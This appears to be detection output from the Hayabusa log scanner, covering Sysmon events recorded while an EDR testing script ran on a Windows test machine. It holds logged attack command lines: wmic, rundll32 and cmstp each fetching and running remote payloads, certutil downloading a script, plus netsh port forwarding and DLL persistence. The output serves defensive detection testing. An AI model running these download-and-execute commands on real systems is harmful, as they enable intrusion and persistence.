""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace show status : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c netsh trace stop : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace show status : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace show status ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Capture a Network Trace with netsh.exe,,rules/sigma/process_creation/win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh trace stop : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh trace stop,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: netsh.exe add helper AllTheThings.dll : Path: C:\Windows\System32\netsh.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c netsh.exe add helper AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,Suspicious Netsh DLL Persistence,,rules/sigma/process_creation/win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat : Path: C:\Windows\System32\dispdiag.exe : User: MSEDGEWIN10\IEUser : Parent Command: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 AllTheThings.dll,EntryPoint : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 AllTheThings.dll,EntryPoint",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"")",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Rundll32 Internet Connection,,rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.252 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:15.658 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.238 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.262 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:20.459 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.269 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf : Path: C:\Windows\System32\cmstp.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:25.659 +09:00,MSEDGEWIN10,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.258 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.685 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe : Path: C:\Windows\System32\forfiles.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:30.807 +09:00,MSEDGEWIN10,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.313 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm qc -q : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.337 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine=""calc""} : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.347 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:34:35.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cscript //nologo ""C:\Windows\System32\winrm.vbs"" qc -q : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c winrm qc -q 